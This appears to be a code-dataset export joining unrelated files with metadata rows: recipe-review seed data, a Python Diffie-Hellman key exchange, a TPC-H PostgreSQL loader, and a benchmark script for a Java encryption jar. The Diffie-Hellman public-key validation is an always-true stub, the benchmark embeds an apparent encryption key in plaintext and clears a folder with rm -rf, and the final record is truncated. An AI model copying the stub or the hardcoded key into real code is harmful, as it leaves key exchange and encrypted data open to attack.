{
"overall": 5,
"review": "If you dont like this there is something wrong with you!",
"recipeId": 24,
"userId": 6
},
{
"overall": 4,
"review": "I have to keep trying to master this dish!",
"recipeId": 23,
"userId": 4
},
{
"overall": 5,
"review": "Awesome!",
"recipeId": 5,
"userId": 7
},
{
"overall": 5,
"review": "If you dont like this there is something wrong with you!",
"recipeId": 19,
"userId": 6
},
{
"overall": 5,
"review": "I loved this",
"recipeId": 32,
"userId": 4
},
{
"overall": 4,
"review": "This was totally great!",
"recipeId": 1,
"userId": 10
},
{
"overall": 3,
"review": "I have to keep trying to master this dish!",
"recipeId": 42,
"userId": 5
},
{
"overall": 3,
"review": "Whoever Wrote this is a genius!",
"recipeId": 17,
"userId": 5
},
{
"overall": 5,
"review": "Never tried this type of food before",
"recipeId": 26,
"userId": 8
},
{
"overall": 5,
"review": "I will always treasure this recipe",
"recipeId": 12,
"userId": 9
},
{
"overall": 3,
"review": "If you dont like this there is something wrong with you!",
"recipeId": 21,
"userId": 10
},
{
"overall": 4,
"review": "I will always treasure this recipe",
"recipeId": 7,
"userId": 3
},
{
"overall": 4,
"review": "I have to keep trying to master this dish!",
"recipeId": 40,
"userId": 6
},
{
"overall": 3,
"review": "If you dont like this there is something wrong with you!",
"recipeId": 3,
"userId": 6
},
{
"overall": 5,
"review": "Awesome!",
"recipeId": 18,
"userId": 10
},
{
"overall": 3,
"review": "Awesome!",
"recipeId": 19,
"userId": 9
},
{
"overall": 3,
"review": "I followed along so easily!",
"recipeId": 25,
"userId": 3
},
{
"overall": 3,
"review": "This was totally great!",
"recipeId": 38,
"userId": 6
},
{
"overall": 5,
"review": "This was totally great!",
"recipeId": 4,
"userId": 5
},
{
"overall": 4,
"review": "I have to keep trying to master this dish!",
"recipeId": 2,
"userId": 5
},
{
"overall": 4,
"review": "I loved this",
"recipeId": 14,
"userId": 4
},
{
"overall": 5,
"review": "My family loved this!",
"recipeId": 20,
"userId": 3
},
{
"overall": 4,
"review": "My family loved this!",
"recipeId": 26,
"userId": 9
},
{
"overall": 3,
"review": "Never tried this type of food before",
"recipeId": 28,
"userId": 4
},
{
"overall": 3,
"review": "I loved this",
"recipeId": 9,
"userId": 7
},
{
"overall": 5,
"review": "I will always treasure this recipe",
"recipeId": 9,
"userId": 5
},
{
"overall": 5,
"review": "My family loved this!",
"recipeId": 30,
"userId": 4
},
{
"overall": 3,
"review": "Awesome!",
"recipeId": 8,
"userId": 6
},
{
"overall": 3,
"review": "I will always treasure this recipe",
"recipeId": 45,
"userId": 3
},
{
"overall": 4,
"review": "My family loved this!",
"recipeId": 11,
"userId": 4
},
{
"overall": 3,
"review": "Never tried this type of food before",
"recipeId": 16,
"userId": 4
},
{
"overall": 4,
"review": "I followed along so easily!",
"recipeId": 41,
"userId": 10
},
{
"overall": 4,
"review": "This was totally great!",
"recipeId": 4,
"userId": 6
},
{
"overall": 4,
"review": "My family loved this!",
"recipeId": 3,
"userId": 8
},
{
"overall": 3,
"review": "I loved this",
"recipeId": 29,
"userId": 9
},
{
"overall": 4,
"review": "Never tried this type of food before",
"recipeId": 13,
"userId": 9
},
{
"overall": 4,
"review": "This was totally great!",
"recipeId": 1,
"userId": 4
},
{
"overall": 5,
"review": "I loved this",
"recipeId": 8,
"userId": 6
},
{
"overall": 4,
"review": "Awesome!",
"recipeId": 27,
"userId": 9
},
{
"overall": 4,
"review": "If you dont like this there is something wrong with you!",
"recipeId": 22,
"userId": 3
},
{
"overall": 5,
"review": "Whoever Wrote this is a genius!",
"recipeId": 42,
"userId": 9
},
{
"overall": 5,
"review": "This was totally great!",
"recipeId": 34,
"userId": 5
},
{
"overall": 3,
"review": "I will always treasure this recipe",
"recipeId": 20,
"userId": 6
},
{
"overall": 5,
"review": "Whoever Wrote this is a genius!",
"recipeId": 41,
"userId": 4
},
{
"overall": 3,
"review": "I loved this",
"recipeId": 18,
"userId": 4
},
{
"overall": 5,
"review": "This was totally great!",
"recipeId": 38,
"userId": 5
},
{
"overall": 5,
"review": "I followed along so easily!",
"recipeId": 20,
"userId": 3
},
{
"overall": 3,
"review": "Awesome!",
"recipeId": 38,
"userId": 6
},
{
"overall": 5,
"review": "This was totally great!",
"recipeId": 15,
"userId": 6
},
{
"overall": 3,
"review": "I followed along so easily!",
"recipeId": 28,
"userId": 5
},
{
"overall": 3,
"review": "Never tried this type of food before",
"recipeId": 39,
"userId": 7
},
{
"overall": 5,
"review": "Awesome!",
"recipeId": 20,
"userId": 5
},
{
"overall": 5,
"review": "Whoever Wrote this is a genius!",
"recipeId": 43,
"userId": 9
},
{
"overall": 5,
"review": "Awesome!",
"recipeId": 25,
"userId": 5
},
{
"overall": 3,
"review": "If you dont like this there is something wrong with you!",
"recipeId": 31,
"userId": 4
},
{
"overall": 3,
"review": "This was totally great!",
"recipeId": 27,
"userId": 4
},
{
"overall": 5,
"review": "This was totally great!",
"recipeId": 8,
"userId": 6
},
{
"overall": 5,
"review": "This was totally great!",
"recipeId": 35,
"userId": 5
},
{
"overall": 5,
"review": "I will always treasure this recipe",
"recipeId": 20,
"userId": 3
},
{
"overall": 4,
"review": "I followed along so easily!",
"recipeId": 46,
"userId": 6
},
{
"overall": 3,
"review": "If you dont like this there is something wrong with you!",
"recipeId": 41,
"userId": 10
},
{
"overall": 5,
"review": "I loved this",
"recipeId": 29,
"userId": 7
},
{
"overall": 4,
"review": "If you dont like this there is something wrong with you!",
"recipeId": 26,
"userId": 8
},
{
"overall": 5,
"review": "This was totally great!",
"recipeId": 2,
"userId": 5
},
{
"overall": 3,
"review": "Whoever Wrote this is a genius!",
"recipeId": 4,
"userId": 6
},
{
"overall": 4,
"review": "If you dont like this there is something wrong with you!",
"recipeId": 12,
"userId": 5
},
{
"overall": 3,
"review": "My family loved this!",
"recipeId": 29,
"userId": 10
},
{
"overall": 4,
"review": "This was totally great!",
"recipeId": 39,
"userId": 9
},
{
"overall": 3,
"review": "My family loved this!",
"recipeId": 31,
"userId": 10
},
{
"overall": 4,
"review": "Never tried this type of food before",
"recipeId": 16,
"userId": 4
},
{
"overall": 3,
"review": "Whoever Wrote this is a genius!",
"recipeId": 28,
"userId": 6
},
{
"overall": 5,
"review": "This was totally great!",
"recipeId": 5,
"userId": 8
},
{
"overall": 5,
"review": "This was totally great!",
"recipeId": 15,
"userId": 3
},
{
"overall": 5,
"review": "Never tried this type of food before",
"recipeId": 2,
"userId": 10
},
{
"overall": 3,
"review": "If you dont like this there is something wrong with you!",
"recipeId": 33,
"userId": 9
},
{
"overall": 4,
"review": "I loved this",
"recipeId": 25,
"userId": 8
},
{
"overall": 5,
"review": "If you dont like this there is something wrong with you!",
"recipeId": 4,
"userId": 10
},
{
"overall": 5,
"review": "This was totally great!",
"recipeId": 33,
"userId": 10
},
{
"overall": 5,
"review": "My family loved this!",
"recipeId": 4,
"userId": 10
},
{
"overall": 4,
"review": "I loved this",
"recipeId": 16,
"userId": 10
},
{
"overall": 5,
"review": "I have to keep trying to master this dish!",
"recipeId": 31,
"userId": 7
},
{
"overall": 4,
"review": "I followed along so easily!",
"recipeId": 23,
"userId": 6
},
{
"overall": 3,
"review": "This was totally great!",
"recipeId": 19,
"userId": 7
},
{
"overall": 4,
"review": "Awesome!",
"recipeId": 40,
"userId": 5
},
{
"overall": 5,
"review": "My family loved this!",
"recipeId": 16,
"userId": 7
},
{
"overall": 3,
"review": "My family loved this!",
"recipeId": 2,
"userId": 4
},
{
"overall": 5,
"review": "I have to keep trying to master this dish!",
"recipeId": 5,
"userId": 5
},
{
"overall": 5,
"review": "Awesome!",
"recipeId": 24,
"userId": 3
},
{
"overall": 4,
"review": "Never tried this type of food before",
"recipeId": 30,
"userId": 5
},
{
"overall": 3,
"review": "Whoever Wrote this is a genius!",
"recipeId": 35,
"userId": 9
},
{
"overall": 4,
"review": "Never tried this type of food before",
"recipeId": 25,
"userId": 4
},
{
"overall": 4,
"review": "Awesome!",
"recipeId": 5,
"userId": 8
},
{
"overall": 5,
"review": "Awesome!",
"recipeId": 18,
"userId": 9
},
{
"overall": 3,
"review": "If you dont like this there is something wrong with you!",
"recipeId": 35,
"userId": 7
},
{
"overall": 5,
"review": "If you dont like this there is something wrong with you!",
"recipeId": 32,
"userId": 5
},
{
"overall": 4,
"review": "I will always treasure this recipe",
"recipeId": 32,
"userId": 9
},
{
"overall": 4,
"review": "I will always treasure this recipe",
"recipeId": 29,
"userId": 6
},
{
"overall": 3,
"review": "I will always treasure this recipe",
"recipeId": 24,
"userId": 9
},
{
"overall": 5,
"review": "My family loved this!",
"recipeId": 32,
"userId": 10
},
{
"overall": 3,
"review": "I followed along so easily!",
"recipeId": 2,
"userId": 7
},
{
"overall": 4,
"review": "I followed along so easily!",
"recipeId": 6,
"userId": 6
}
]
)
db.session.commit()
# Uses a raw SQL query to TRUNCATE the locations table.
# SQLAlchemy doesn't have a built in function to do this
# TRUNCATE Removes all the data from the table, and resets
# the auto incrementing primary key
def undo_reviews():
db.session.execute('TRUNCATE reviews;')
db.session.commit()
| 56.959117
| 113
| 0.160692
| 2,567
| 69,661
| 4.359174
| 0.055707
| 0.056479
| 0.098838
| 0.037534
| 0.952904
| 0.90286
| 0.888293
| 0.808311
| 0.74647
| 0.68588
| 0
| 0.05081
| 0.779346
| 69,661
| 1,222
| 114
| 57.005728
| 0.677184
| 0.003818
| 0
| 0.657851
| 0
| 0
| 0.159824
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.001653
| true
| 0
| 0.000826
| 0
| 0.002479
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
12d3d03d0b49088a3581186d8746a2f03cf5cccc
| 8,476
|
py
|
Python
|
diffie-hellman.py
|
draescherl/diffie-hellman
|
bf9623233d6dd74e0821b9f8a7c8ae99f80a2930
|
[
"Apache-2.0"
] | null | null | null |
diffie-hellman.py
|
draescherl/diffie-hellman
|
bf9623233d6dd74e0821b9f8a7c8ae99f80a2930
|
[
"Apache-2.0"
] | null | null | null |
diffie-hellman.py
|
draescherl/diffie-hellman
|
bf9623233d6dd74e0821b9f8a7c8ae99f80a2930
|
[
"Apache-2.0"
] | null | null | null |
from os import urandom
from sys import exit
# See https://tools.ietf.org/html/rfc3526 for these groups :
groups = {
# 1536-bit
5: {
"prime": 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA237327FFFFFFFFFFFFFFFF,
"generator": 2
},
# 2048-bit
14: {
"prime": 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AACAA68FFFFFFFFFFFFFFFF,
"generator": 2
},
# 3072-bit
15: {
"prime": 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AAAC42DAD33170D04507A33A85521ABDF1CBA64ECFB850458DBEF0A8AEA71575D060C7DB3970F85A6E1E4C7ABF5AE8CDB0933D71E8C94E04A25619DCEE3D2261AD2EE6BF12FFA06D98A0864D87602733EC86A64521F2B18177B200CBBE117577A615D6C770988C0BAD946E208E24FA074E5AB3143DB5BFCE0FD108E4B82D120A93AD2CAFFFFFFFFFFFFFFFF,
"generator": 2
},
# 4096-bit
16: {
"prime": 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AAAC42DAD33170D04507A33A85521ABDF1CBA64ECFB850458DBEF0A8AEA71575D060C7DB3970F85A6E1E4C7ABF5AE8CDB0933D71E8C94E04A25619DCEE3D2261AD2EE6BF12FFA06D98A0864D87602733EC86A64521F2B18177B200CBBE117577A615D6C770988C0BAD946E208E24FA074E5AB3143DB5BFCE0FD108E4B82D120A92108011A723C12A787E6D788719A10BDBA5B2699C327186AF4E23C1A946834B6150BDA2583E9CA2AD44CE8DBBBC2DB04DE8EF92E8EFC141FBECAA6287C59474E6BC05D99B2964FA090C3A2233BA186515BE7ED1F612970CEE2D7AFB81BDD762170481CD0069127D5B05AA993B4EA988D8FDDC186FFB7DC90A6C08F4DF435C934063199FFFFFFFFFFFFFFFF,
"generator": 2
},
# 6144-bit
17: {
"prime": 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AAAC42DAD33170D04507A33A85521ABDF1CBA64ECFB850458DBEF0A8AEA71575D060C7DB3970F85A6E1E4C7ABF5AE8CDB0933D71E8C94E04A25619DCEE3D2261AD2EE6BF12FFA06D98A0864D87602733EC86A64521F2B18177B200CBBE117577A615D6C770988C0BAD946E208E24FA074E5AB3143DB5BFCE0FD108E4B82D120A92108011A723C12A787E6D788719A10BDBA5B2699C327186AF4E23C1A946834B6150BDA2583E9CA2AD44CE8DBBBC2DB04DE8EF92E8EFC141FBECAA6287C59474E6BC05D99B2964FA090C3A2233BA186515BE7ED1F612970CEE2D7AFB81BDD762170481CD0069127D5B05AA993B4EA988D8FDDC186FFB7DC90A6C08F4DF435C93402849236C3FAB4D27C7026C1D4DCB2602646DEC9751E763DBA37BDF8FF9406AD9E530EE5DB382F413001AEB06A53ED9027D831179727B0865A8918DA3EDBEBCF9B14ED44CE6CBACED4BB1BDB7F1447E6CC254B332051512BD7AF426FB8F401378CD2BF5983CA01C64B92ECF032EA15D1721D03F482D7CE6E74FEF6D55E702F46980C82B5A84031900B1C9E59E7C97FBEC7E8F323A97A7E36CC88BE0F1D45B7FF585AC54BD407B22B4154AACC8F6D7EBF48E1D814CC5ED20F8037E0A79715EEF29BE32806A1D58BB7C5DA76F550AA3D8A1FBFF0EB19CCB1A313D55CDA56C9EC2EF29632387FE8D76E3C0468043E8F663F4860EE12BF2D5B0B7474D6E694F91E6DCC4024FFFFFFFFFFFFFFFF,
"generator": 2
},
# 8192-bit
18: {
"prime": 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AAAC42DAD33170D04507A33A85521ABDF1CBA64ECFB850458DBEF0A8AEA71575D060C7DB3970F85A6E1E4C7ABF5AE8CDB0933D71E8C94E04A25619DCEE3D2261AD2EE6BF12FFA06D98A0864D87602733EC86A64521F2B18177B200CBBE117577A615D6C770988C0BAD946E208E24FA074E5AB3143DB5BFCE0FD108E4B82D120A92108011A723C12A787E6D788719A10BDBA5B2699C327186AF4E23C1A946834B6150BDA2583E9CA2AD44CE8DBBBC2DB04DE8EF92E8EFC141FBECAA6287C59474E6BC05D99B2964FA090C3A2233BA186515BE7ED1F612970CEE2D7AFB81BDD762170481CD0069127D5B05AA993B4EA988D8FDDC186FFB7DC90A6C08F4DF435C93402849236C3FAB4D27C7026C1D4DCB2602646DEC9751E763DBA37BDF8FF9406AD9E530EE5DB382F413001AEB06A53ED9027D831179727B0865A8918DA3EDBEBCF9B14ED44CE6CBACED4BB1BDB7F1447E6CC254B332051512BD7AF426FB8F401378CD2BF5983CA01C64B92ECF032EA15D1721D03F482D7CE6E74FEF6D55E702F46980C82B5A84031900B1C9E59E7C97FBEC7E8F323A97A7E36CC88BE0F1D45B7FF585AC54BD407B22B4154AACC8F6D7EBF48E1D814CC5ED20F8037E0A79715EEF29BE32806A1D58BB7C5DA76F550AA3D8A1FBFF0EB19CCB1A313D55CDA56C9EC2EF29632387FE8D76E3C0468043E8F663F4860EE12BF2D5B0B7474D6E694F91E6DBE115974A3926F12FEE5E438777CB6A932DF8CD8BEC4D073B931BA3BC832B68D9DD300741FA7BF8AFC47ED2576F6936BA424663AAB639C5AE4F5683423B4742BF1C978238F16CBE39D652DE3FDB8BEFC848AD922222E04A4037C0713EB57A81A23F0C73473FC646CEA306B4BCBC8862F8385DDFA9D4B7FA2C087E879683303ED5BDD3A062B3CF5B3A278A66D2A13F83F44F82DDF310EE074AB6A364597E899A0255DC164F31CC50846851DF9AB48195DED7EA1B1D510BD7EE74D73FAF36BC31ECFA268359046F4EB879F924009438B481C6CD7889A002ED5EE382BC9190DA6FC026E479558E4475677E9AA9E3050E2765694DFC81F56E880B96E7160C980DD98EDD3DFFFFFFFFFFFFFFFFF,
"generator": 2
}
}
# Class to implement the DiffieHellman algorithm
# For a simple example on how this algorithm works,
# see https://en.wikipedia.org/wiki/Diffie%E2%80%93Hellman_key_exchange#Cryptographic_explanation
class DiffieHellman:
# Instanciate the class by calling one of the g/p pairs
# 2048-bit is the minimum recommended length
def __init__(self, group=14):
if group in groups:
self.__p = groups[group]["prime"]
self.__g = groups[group]["generator"]
else:
print("Group not supported :", group)
exit()
# Get the hex value of the random value generated
# by the Linux getrandom() syscall
self.__private_key = int(urandom(32).hex(), base=16)
# Getter for the private key
def get_private_key(self):
return self.__private_key
# Compute g^a mod p where a is the private key
def generate_pubkey(self):
return pow(self.__g, self.__private_key, self.__p)
# TODO : write method to check the strength of the partner's pubkey
def __check_other_pubkey(self, other_pubkey):
return True
# Compute B^a mod p where B is the partner's pubkey
def gen_shared_key(self, other_pubkey):
if self.__check_other_pubkey(other_pubkey):
self.__shared_key = pow(other_pubkey, self.__private_key, self.__p)
return hex(self.__shared_key)
else:
print("Unsupported partner key")
exit()
# test :
dh1 = DiffieHellman()
dh2 = DiffieHellman()
a = dh1.generate_pubkey()
b = dh2.generate_pubkey()
s = dh1.gen_shared_key(b)
print("s =", s)
| 88.291667
| 2,068
| 0.895116
| 288
| 8,476
| 26.149306
| 0.416667
| 0.009295
| 0.007436
| 0.004249
| 0.010357
| 0
| 0
| 0
| 0
| 0
| 0
| 0.493927
| 0.077277
| 8,476
| 96
| 2,069
| 88.291667
| 0.468994
| 0.079873
| 0
| 0.178571
| 0
| 0
| 0.01864
| 0
| 0
| 1
| 0.807816
| 0.010417
| 0
| 1
| 0.089286
| false
| 0
| 0.035714
| 0.053571
| 0.214286
| 0.053571
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
12f914556ba67c0084c1d1f6a92e6df505191b6f
| 4,461
|
py
|
Python
|
tpch4pgsql/load.py
|
bombehub/tpch-pgsql
|
f377df82766603f5795ad05a8a101f08526358d7
|
[
"Apache-2.0"
] | null | null | null |
tpch4pgsql/load.py
|
bombehub/tpch-pgsql
|
f377df82766603f5795ad05a8a101f08526358d7
|
[
"Apache-2.0"
] | null | null | null |
tpch4pgsql/load.py
|
bombehub/tpch-pgsql
|
f377df82766603f5795ad05a8a101f08526358d7
|
[
"Apache-2.0"
] | null | null | null |
import os
from tpch4pgsql import postgresqldb as pgdb
def clean_database(query_root, host, port, db_name, user, password, tables):
"""Drops the tables if they exist
Args:
query_root (str): Directory in which generated queries directory exists
host (str): IP/hostname of the PG instance
port (int): port for the PG instance
db_name (str): name of the tpch database
user (str): user for the PG instance
password (str): password for the PG instance
tables (str): list of tables
Return:
0 if successful
non zero otherwise
"""
try:
conn = pgdb.PGDB(host, port, db_name, user, password)
try:
for table in tables:
conn.executeQuery("DROP TABLE IF EXISTS %s " % table)
except Exception as e:
print("unable to remove existing tables. %s" % e)
return 1
print("dropped existing tables")
conn.commit()
conn.close()
return 0
except Exception as e:
print("unable to connect to the database. %s" % e)
return 1
def create_schema(query_root, host, port, db_name, user, password, prep_query_dir):
"""Creates the schema for the tests. Drops the tables if they exist
Args:
query_root (str): Directory in which generated queries directory exists
host (str): IP/hostname of the PG instance
port (int): port for the PG instance
db_name (str): name of the tpch database
user (str): user for the PG instance
password (str): password for the PG instance
prep_query_dir (str): directory with queries for schema creation
Return:
0 if successful
non zero otherwise
"""
try:
conn = pgdb.PGDB(host, port, db_name, user, password)
try:
conn.executeQueryFromFile(os.path.join(query_root, prep_query_dir, "create_tbl.sql"))
except Exception as e:
print("unable to run create tables. %s" % e)
return 1
conn.commit()
conn.close()
except Exception as e:
print("unable to connect to the database. %s" % e)
return 1
def load_tables(data_dir, host, port, db_name, user, password, tables, load_dir):
"""Loads data into tables. Expects that tables are already empty.
Args:
data_dir (str): Directory in which load data exists
host (str): IP/hostname of the PG instance
port (int): port for the PG instance
db_name (str): name of the tpch database
user (str): user for the PG instance
password (str): password for the PG instance
tables (str): list of tables
load_dir (str): directory with data files to be loaded
Return:
0 if successful
non zero otherwise
"""
try:
conn = pgdb.PGDB(host, port, db_name, user, password)
try:
for table in tables:
filepath = os.path.join(data_dir, load_dir, table.lower() + ".tbl.csv")
conn.copyFrom(filepath, separator="|", table=table.lower())
conn.commit()
except Exception as e:
print("unable to run load tables. %s" %e)
return 1
conn.close()
return 0
except Exception as e:
print("unable to connect to the database. %s" % e)
return 1
def index_tables(query_root, host, port, db_name, user, password, prep_query_dir):
"""Creates indexes and foreign keys for loaded tables.
Args:
query_root (str): Directory in which preparation queries directory exists
host (str): IP/hostname of the PG instance
port (int): port for the PG instance
db_name (str): name of the tpch database
user (str): user for the PG instance
password (str): password for the PG instance
prep_query_dir (str): directory with create index script
Return:
0 if successful
non zero otherwise
"""
try:
conn = pgdb.PGDB(host, port, db_name, user, password)
try:
conn.executeQueryFromFile(os.path.join(query_root, prep_query_dir, "create_idx.sql"))
conn.commit()
except Exception as e:
print("unable to run index tables. %s" % e)
return 1
conn.close()
return 0
except Exception as e:
print("unable to connect to the database. %s" % e)
return 1
| 34.053435
| 97
| 0.60928
| 603
| 4,461
| 4.434494
| 0.174129
| 0.029918
| 0.077786
| 0.071803
| 0.786462
| 0.780853
| 0.773747
| 0.735976
| 0.710172
| 0.710172
| 0
| 0.005203
| 0.310693
| 4,461
| 130
| 98
| 34.315385
| 0.86439
| 0.421206
| 0
| 0.737705
| 0
| 0
| 0.151631
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.065574
| false
| 0.131148
| 0.032787
| 0
| 0.278689
| 0.147541
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
12fd36c031ee93bf7da6c5662b6bf742e39bc47b
| 4,591
|
py
|
Python
|
test_scripts/test_time.py
|
piaolaidelangman/xgboost-spark-sgx
|
305693e3e10436802d3f399df451305e5baf2056
|
[
"Apache-2.0"
] | null | null | null |
test_scripts/test_time.py
|
piaolaidelangman/xgboost-spark-sgx
|
305693e3e10436802d3f399df451305e5baf2056
|
[
"Apache-2.0"
] | null | null | null |
test_scripts/test_time.py
|
piaolaidelangman/xgboost-spark-sgx
|
305693e3e10436802d3f399df451305e5baf2056
|
[
"Apache-2.0"
] | null | null | null |
import os
import sys
import subprocess
# avg_times = 3
# splitRange = [8,16,32,64,128,256]
# sizeRange = [2,4,8,16,32]
# with open("time.csv",'w') as timeFile:
# timeFile.write("filesize, splitnum, time1, time2, time3, averagetime\n")
# for i in sizeRange:
# for j in splitRange:
# sentence = ((str(i) + "G, ") + str(j) + ", ")
# total_time = 0
# for k in range(avg_times):
# cmd = """rm -rf ~/diankun/Output/* && java -cp target/xgboostsparksgx-1.0-SNAPSHOT-jar-with-dependencies.jar xgboostsparksgx.SplitAndEncryptForXgboost ~/diankun/data/""" + str(i) + """G_data LDlxjm0y3HdGFniIGviJnMJbmFI+lt3dfIVyPJm1YSY= ~/diankun/Output """ + str(j)
# ret, val = subprocess.getstatusoutput(cmd)
# for line in val.split("\n"):
# if "time" in line:
# tmpTime = line.split(" ")[3]
# sentence += (tmpTime+", ")
# total_time += int(tmpTime)
# break
# avg_time = int(total_time/avg_times)
# sentence += str(avg_time)
# print("SUCCESS SUCCESS " + sentence)
# timeFile.write(sentence + "\n")
avg_times = 3
splitRange8 = [32,64,128,256]
splitRange16 = [64,128,256,512]
splitRange32 = [128,256,512]
sizeRange = [8,16,32]
with open("time.csv",'w') as timeFile:
timeFile.write("filesize, splitnum, time1, time2, time3, averagetime\n")
for i in sizeRange:
if i == 8:
for j in splitRange8:
sentence = ((str(i) + "G, ") + str(j) + ", ")
total_time = 0
for k in range(avg_times):
cmd = """rm -rf ~/diankun/Output/* && java -cp target/xgboostsparksgx-1.0-SNAPSHOT-jar-with-dependencies.jar xgboostsparksgx.SplitAndEncryptForXgboost ~/diankun/data/""" + str(i) + """G_data LDlxjm0y3HdGFniIGviJnMJbmFI+lt3dfIVyPJm1YSY= ~/diankun/Output """ + str(j)
ret, val = subprocess.getstatusoutput(cmd)
for line in val.split("\n"):
if "time" in line:
tmpTime = line.split(" ")[3]
sentence += (tmpTime+", ")
total_time += int(tmpTime)
break
avg_time = int(total_time/avg_times)
sentence += str(avg_time)
print("SUCCESS SUCCESS " + sentence)
timeFile.write(sentence + "\n")
elif i == 16:
for j in splitRange16:
sentence = ((str(i) + "G, ") + str(j) + ", ")
total_time = 0
for k in range(avg_times):
cmd = """rm -rf ~/diankun/Output/* && java -cp target/xgboostsparksgx-1.0-SNAPSHOT-jar-with-dependencies.jar xgboostsparksgx.SplitAndEncryptForXgboost ~/diankun/data/""" + str(i) + """G_data LDlxjm0y3HdGFniIGviJnMJbmFI+lt3dfIVyPJm1YSY= ~/diankun/Output """ + str(j)
ret, val = subprocess.getstatusoutput(cmd)
for line in val.split("\n"):
if "time" in line:
tmpTime = line.split(" ")[3]
sentence += (tmpTime+", ")
total_time += int(tmpTime)
break
avg_time = int(total_time/avg_times)
sentence += str(avg_time)
print("SUCCESS SUCCESS " + sentence)
timeFile.write(sentence + "\n")
else:
for j in splitRange32:
sentence = ((str(i) + "G, ") + str(j) + ", ")
total_time = 0
for k in range(avg_times):
cmd = """rm -rf ~/diankun/Output/* && java -cp target/xgboostsparksgx-1.0-SNAPSHOT-jar-with-dependencies.jar xgboostsparksgx.SplitAndEncryptForXgboost ~/diankun/data/""" + str(i) + """G_data LDlxjm0y3HdGFniIGviJnMJbmFI+lt3dfIVyPJm1YSY= ~/diankun/Output """ + str(j)
ret, val = subprocess.getstatusoutput(cmd)
for line in val.split("\n"):
if "time" in line:
tmpTime = line.split(" ")[3]
sentence += (tmpTime+", ")
total_time += int(tmpTime)
break
avg_time = int(total_time/avg_times)
sentence += str(avg_time)
print("SUCCESS SUCCESS " + sentence)
timeFile.write(sentence + "\n")
| 52.170455
| 285
| 0.503812
| 466
| 4,591
| 4.890558
